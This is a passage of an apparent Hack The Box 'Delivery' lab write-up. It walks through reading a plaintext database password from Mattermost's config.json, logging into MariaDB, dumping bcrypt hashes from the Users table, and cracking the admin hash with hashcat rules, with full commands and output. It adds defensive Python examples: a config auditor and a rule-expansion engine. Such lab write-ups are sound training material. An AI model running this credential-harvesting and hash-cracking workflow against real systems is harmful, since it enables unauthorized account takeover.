Mattermost
After conducting some basic enumeration, I decided to check the installation directory of the Mattermost instance.
maildeliverer@delivery:/opt/mattermost$ ll
total 288K
4.0K drwxr--r-- 5 mattermost mattermost 4.0K Mar 27 11:08 plugins
4.0K drwxrwxr-x 3 mattermost mattermost 4.0K Mar 27 10:54 data
4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Jul 14 2021 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 14 2021 ..
4.0K drwxrwxr-x 7 mattermost mattermost 4.0K Dec 26 2020 client
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 2020 logs
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 2020 config
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 prepackaged_plugins
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 bin
4.0K -rw-rw-r-- 1 mattermost mattermost 2.1K Dec 18 2020 ENTERPRISE-EDITION-LICENSE.txt
4.0K -rw-rw-r-- 1 mattermost mattermost 898 Dec 18 2020 manifest.txt
224K -rw-rw-r-- 1 mattermost mattermost 224K Dec 18 2020 NOTICE.txt
8.0K -rw-rw-r-- 1 mattermost mattermost 6.2K Dec 18 2020 README.md
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 fonts
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 i18n
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 templates
The application is installed in the /opt/mattermost directory.
maildeliverer@delivery:/opt/mattermost/config$ cat config.json
[...REDACTED...]
  "sqlsettings": {
    "drivername": "mysql",
    "datasource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
    "datasourcereplicas": [],
    "datasourcesearchreplicas": [],
    "maxidleconns": 20,
    "connmaxlifetimemilliseconds": 3600000,
    "maxopenconns": 300,
    "trace": false,
    "atrestencryptkey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
    "querytimeout": 30,
    "disabledatabasesearch": false
  }
[...REDACTED...]
There is a DB connection string in the config/config.json file, and it contains a DB credential: mmuser:Crack_The_MM_Admin_PW
The password is very suggestive, as it reads “Crack The Mattermost Admin’s Password”.
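The credential above sits in plaintext inside a config file that a low-privileged local account could read. As an added example (not code from the writeup or from Mattermost), the script below parses the Go-style MySQL DSN used in the DataSource field, reports what a reader of the file learns, and produces a redacted form of the DSN that is safe to put in logs or tickets. The sample config text and the file mode passed to the audit are constructed for the demonstration; the key lookup is case-insensitive because Mattermost writes SqlSettings/DataSource while the listing above shows them lowercased. Passwords containing '@' are not handled by the regex.

```python
"""Audit a Mattermost-style config.json for an embedded database credential.

Added example, not part of the original writeup or of Mattermost. It parses
the Go MySQL DSN format used by the DataSource field
([user[:password]@][protocol[(address)]]/dbname[?params]) so a reviewer can
see which fields a leaked config exposes and log the DSN with the password
redacted. Assumption: the password contains no '@'.
"""
from __future__ import annotations

import json
import re

_DSN_RE = re.compile(
    r"^(?:(?P<user>[^:@]*)(?::(?P<password>[^@]*))?@)?"   # user[:password]@
    r"(?:(?P<proto>[a-z]+)(?:\((?P<addr>[^)]*)\))?)?"     # protocol(address)
    r"/(?P<db>[^?]*)(?:\?(?P<params>.*))?$"               # /dbname?params
)

# Constructed sample modelled on the sqlsettings block shown above; the
# \u0026 escapes are how JSON encodes '&' and json.loads decodes them.
SAMPLE_CONFIG = r"""{
  "sqlsettings": {
    "drivername": "mysql",
    "datasource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s"
  }
}"""


def parse_dsn(dsn: str) -> dict:
    """Break a DSN into its components; absent parts are None."""
    m = _DSN_RE.match(dsn)
    if not m:
        raise ValueError(f"not a Go MySQL DSN: {dsn!r}")
    g = m.groupdict()
    addr = g["addr"] or ""
    host, sep, port = addr.rpartition(":")
    if not sep:                      # address without a port, e.g. "localhost"
        host, port = addr, ""
    params = dict(p.split("=", 1) for p in (g["params"] or "").split("&") if "=" in p)
    return {
        "user": g["user"] or None,
        "password": g["password"],
        "proto": g["proto"],
        "host": host or None,
        "port": int(port) if port.isdigit() else None,
        "db": g["db"],
        "params": params,
    }


def redact_dsn(dsn: str) -> str:
    """Return the DSN with its password masked so it can be logged safely."""
    m = _DSN_RE.match(dsn)
    if not m or m.group("password") is None:
        return dsn
    start, end = m.span("password")
    return dsn[:start] + "***" + dsn[end:]


def _get_ci(obj: dict, key: str):
    """Case-insensitive key lookup (SqlSettings vs. sqlsettings)."""
    for k, v in obj.items():
        if k.lower() == key.lower():
            return v
    return None


def audit_config(config_text: str, file_mode: int | None = None) -> dict:
    """Summarise what a reader of this config.json learns about the database.

    file_mode is the file's permission bits (e.g. from os.stat), passed in so
    the check runs on embedded sample text as well as on a real file.
    """
    cfg = json.loads(config_text)
    sql = _get_ci(cfg, "SqlSettings") or {}
    dsn = _get_ci(sql, "DataSource") or ""
    parsed = parse_dsn(dsn)
    findings = []
    if parsed["password"]:
        findings.append("DataSource embeds the database password in plaintext")
    if file_mode is not None and file_mode & 0o004:
        findings.append("config.json is readable by every local user")
    return {
        "user": parsed["user"],
        "db": parsed["db"],
        "host": parsed["host"],
        "port": parsed["port"],
        "dsn_redacted": redact_dsn(dsn),
        "findings": findings,
    }


if __name__ == "__main__":
    import pprint
    # 0o664 is a constructed mode for the demo; read it from os.stat on a real file.
    pprint.pprint(audit_config(SAMPLE_CONFIG, file_mode=0o664))
```

The redacted DSN keeps the user, host, port and database name, which is what an operator needs when reading a log, while the only secret in the string is masked.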
DB
maildeliverer@delivery:/opt/mattermost/config$ mysql -ummuser -pCrack_The_MM_Admin_PW
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 263
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Using the DB credential, I was able to authenticate to the mysqld service.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
The database is named mattermost.
Table
MariaDB [mattermost]> SELECT Username,Password,Roles FROM Users;
+----------------------------------+--------------------------------------------------------------+--------------------------+
| Username | Password | Roles |
+----------------------------------+--------------------------------------------------------------+--------------------------+
| test2 | $2a$10$IfPTFaRLz1wRVqeiizSQtOWuIQ49K08Dp6nVEPR3olAvrJbCrB9BG | system_user |
| tester | $2a$10$GN/JuAq4gj2kXC2v0hYAGeEcraFXjG6QxHSa3E/MtY79t7K37kYfK | system_user |
| surveybot | | system_user |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | system_user |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | system_user |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | system_admin system_user |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | system_user |
| channelexport | | system_user |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | system_user |
| test | $2a$10$fyPkviKdm4yHIrnUV8mO9.n8YsFOZGqbHdERKXXtCigC3ayFitV4e | system_user |
+----------------------------------+--------------------------------------------------------------+--------------------------+
10 rows in set (0.001 sec)
Checking the mattermost.Users table reveals all the users, including the root user, who has the system_admin role.
I will grab the root user's password hash and get cracking.
Password Cracking
I remember the 2nd message from the root user in the Internal chat earlier.
It mentions a password (PleaseSubscribe!) and that it is easily crackable with hashcat rules.
That explains the very suggestive password of the DB credential. It appears that I am supposed to use hashcat rules to crack the password hash.
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ ll /usr/share/hashcat/rules/
total 2.9M
4.0K drwxr-xr-x 3 root root 4.0K Oct 11 13:58 .
12K drwxr-xr-x 2 root root 12K Oct 11 13:58 hybrid
4.0K drwxr-xr-x 9 root root 4.0K Oct 11 13:58 ..
4.0K -rw-r--r-- 1 root root 933 Oct 6 11:50 best64.rule
4.0K -rw-r--r-- 1 root root 754 Oct 6 11:50 combinator.rule
200K -rw-r--r-- 1 root root 197K Oct 6 11:50 d3ad0ne.rule
772K -rw-r--r-- 1 root root 770K Oct 6 11:50 dive.rule
476K -rw-r--r-- 1 root root 473K Oct 6 11:50 generated2.rule
80K -rw-r--r-- 1 root root 77K Oct 6 11:50 generated.rule
304K -rw-r--r-- 1 root root 303K Oct 6 11:50 Incisive-leetspeak.rule
36K -rw-r--r-- 1 root root 35K Oct 6 11:50 InsidePro-HashManager.rule
24K -rw-r--r-- 1 root root 21K Oct 6 11:50 InsidePro-PasswordsPro.rule
4.0K -rw-r--r-- 1 root root 298 Oct 6 11:50 leetspeak.rule
4.0K -rw-r--r-- 1 root root 1.3K Oct 6 11:50 oscommerce.rule
296K -rw-r--r-- 1 root root 295K Oct 6 11:50 rockyou-30000.rule
4.0K -rw-r--r-- 1 root root 1.6K Oct 6 11:50 specific.rule
4.0K -rw-r--r-- 1 root root 1.3K Oct 6 11:50 T0XlC_3_rule.rule
64K -rw-r--r-- 1 root root 63K Oct 6 11:50 T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
168K -rw-r--r-- 1 root root 165K Oct 6 11:50 T0XlC_insert_HTML_entities_0_Z.rule
4.0K -rw-r--r-- 1 root root 2.0K Oct 6 11:50 T0XlC-insert_space_and_special_0_F.rule
36K -rw-r--r-- 1 root root 34K Oct 6 11:50 T0XlC-insert_top_100_passwords_1_G.rule
36K -rw-r--r-- 1 root root 34K Oct 6 11:50 T0XlC.rule
196K -rw-r--r-- 1 root root 193K Oct 6 11:50 T0XlCv2.rule
4.0K -rw-r--r-- 1 root root 45 Oct 6 11:50 toggles1.rule
4.0K -rw-r--r-- 1 root root 570 Oct 6 11:50 toggles2.rule
4.0K -rw-r--r-- 1 root root 3.7K Oct 6 11:50 toggles3.rule
16K -rw-r--r-- 1 root root 16K Oct 6 11:50 toggles4.rule
48K -rw-r--r-- 1 root root 48K Oct 6 11:50 toggles5.rule
56K -rw-r--r-- 1 root root 55K Oct 6 11:50 unix-ninja-leetspeak.rule
By default, hashcat stores rules in the /usr/share/hashcat/rules/ directory, and it ships with a handful of rule files.
Rules can also be customized.
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ cat passwd
PleaseSubscribe!
First, I need to create a file containing the potential password pointed to by the root user.
This will be used as the base word from which the applied rule generates candidate passwords.
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ hashcat -a 0 -m 3200 root.hash passwd -r /usr/share/hashcat/rules/best64.rule
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
Dictionary cache hit:
* Filename..: passwd
* Passwords.: 1
* Bytes.....: 17
* Keyspace..: 77
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Mar 28 03:16:15 2023 (1 sec)
Time.Estimated...: Tue Mar 28 03:16:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwd)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 20 H/s (1.37ms) @ Accel:3 Loops:32 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:992-1024
Candidate.Engine.: Device Generator
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util: 29%
Started: Tue Mar 28 03:16:10 2023
Stopped: Tue Mar 28 03:16:18 2023
By using the -r flag, I can apply the rule of choice. I went with what appears to be the most generic one, best64.rule.
Just like that, it’s cracked: PleaseSubscribe!21
Now that the password hash is cracked, I should test it out.
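To make visible what -r actually does to the single base word above, here is an added example (not code from the writeup, and not hashcat's own implementation): a small engine for a subset of the hashcat rule syntax, with a constructed rule list written in the style of best64.rule rather than copied from it. It applies every rule line to each base word in the same order hashcat does, which is why the Keyspace for one word and a 77-line rule file was reported as 77. The verification step uses a SHA-256 of a constructed target as a stand-in for the bcrypt comparison hashcat mode 3200 performs, so the block runs without a bcrypt library. Rule functions outside the supported set raise an error rather than being silently skipped.

```python
"""Minimal hashcat-style rule engine.

Added example, not part of the original writeup or of hashcat itself. It
implements a subset of hashcat's rule functions so the candidates that -r
derives from a base word can be inspected offline.
"""
from __future__ import annotations

import hashlib
from typing import Callable

# Hashcat writes positions and counts as one character: 0-9, then A-Z for 10-35.
_POS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def _pos(ch: str) -> int:
    return _POS.index(ch.upper())


# Each function takes the current word and its argument characters (maybe empty).
_FUNCS: dict[str, Callable[[str, str], str]] = {
    ":": lambda w, a: w,                                   # no-op
    "l": lambda w, a: w.lower(),
    "u": lambda w, a: w.upper(),
    "c": lambda w, a: w[:1].upper() + w[1:].lower(),       # capitalize
    "C": lambda w, a: w[:1].lower() + w[1:].upper(),       # invert capitalize
    "t": lambda w, a: w.swapcase(),                        # toggle case
    "r": lambda w, a: w[::-1],                             # reverse
    "d": lambda w, a: w * 2,                               # duplicate
    "f": lambda w, a: w + w[::-1],                         # reflect
    "$": lambda w, a: w + a,                               # append char
    "^": lambda w, a: a + w,                               # prepend char
    "[": lambda w, a: w[1:],                               # delete first
    "]": lambda w, a: w[:-1],                              # delete last
    "{": lambda w, a: w[1:] + w[:1],                       # rotate left
    "}": lambda w, a: w[-1:] + w[:-1],                     # rotate right
    "'": lambda w, a: w[:_pos(a)],                         # truncate to N
    "@": lambda w, a: w.replace(a, ""),                    # purge char
    "s": lambda w, a: w.replace(a[0], a[1]),               # replace X with Y
    "D": lambda w, a: w[:_pos(a)] + w[_pos(a) + 1:],       # delete at N
    "T": lambda w, a: w[:_pos(a)] + w[_pos(a):_pos(a) + 1].swapcase() + w[_pos(a) + 1:],
}

# Number of argument characters each function consumes.
_ARITY = {op: 0 for op in ":lucCtrdf[]{}"}
_ARITY.update({op: 1 for op in "$^'@DT"})
_ARITY["s"] = 2


def parse_rule(line: str) -> list[str]:
    """Split one rule line into functions, walking by arity so that a space
    can still be a function argument (e.g. "$ ")."""
    funcs, i = [], 0
    while i < len(line):
        ch = line[i]
        if ch == " ":
            i += 1
            continue
        if ch not in _ARITY:
            raise ValueError(f"unsupported rule function {ch!r} in {line!r}")
        end = i + 1 + _ARITY[ch]
        if end > len(line):
            raise ValueError(f"truncated argument in rule {line!r}")
        funcs.append(line[i:end])
        i = end
    return funcs


def apply_rule(word: str, line: str) -> str:
    """Apply every function on one rule line, left to right."""
    for fn in parse_rule(line):
        word = _FUNCS[fn[0]](word, fn[1:])
    return word


def load_rules(text: str) -> list[str]:
    """Rule files allow blank lines and '#' comments; everything else is a rule."""
    return [ln for ln in text.split("\n") if ln.strip() and not ln.lstrip().startswith("#")]


def generate_candidates(base_words, rule_lines):
    """Yield (rule, candidate) in hashcat's order: every rule per base word.
    The keyspace is len(base_words) * len(rule_lines)."""
    for word in base_words:
        for rule in rule_lines:
            yield rule, apply_rule(word, rule)


def find_match(base_words, rule_lines, verify):
    """Return the first (rule, candidate) that verify() accepts, or None."""
    for rule, cand in generate_candidates(base_words, rule_lines):
        if verify(cand):
            return rule, cand
    return None


# Constructed sample in the style of best64.rule (not a copy of it).
SAMPLE_RULES = load_rules("""
# identity, reverse, case changes
:
r
u
c
T0
# digit suffixes
$1
$2
$1 $2
$2 $1
# substitutions and truncation
sa@
se3
] $1
'5
""")

# Constructed target: SHA-256 stands in for the bcrypt check of mode 3200.
_TARGET = hashlib.sha256(b"PleaseSubscribe!21").hexdigest()


def verify_sha256(candidate: str) -> bool:
    return hashlib.sha256(candidate.encode()).hexdigest() == _TARGET


if __name__ == "__main__":
    for rule, cand in generate_candidates(["PleaseSubscribe!"], SAMPLE_RULES):
        print(f"{rule:<8} -> {cand}")
    print("match:", find_match(["PleaseSubscribe!"], SAMPLE_RULES, verify_sha256))
```

The point for a defender is the size of the amplifier: a single guessable base word times a few dozen mechanical transformations covers exactly the "known phrase plus a digit or two" variants that a password policy counting only length and character classes accepts.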